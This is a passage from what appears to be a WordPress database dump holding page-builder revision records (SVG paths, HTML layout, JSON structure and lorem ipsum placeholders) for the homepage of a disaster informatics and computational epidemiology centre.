d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:42:03','2022-02-16 15:42:03','',22,'https://gsudice.dataconn.net/?p=311',0,'revision','',0),(315,1,'2022-02-16 15:43:42','2022-02-16 15:43:42','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:43:42','2022-02-16 15:43:42','',168,'https://gsudice.dataconn.net/?p=315',0,'revision','',0),(316,1,'2022-02-16 15:43:42','2022-02-16 15:43:42','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c6\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c10\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c14\">\n <!---->\n <!---->\n <h5 class=\"\">population disparities</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n 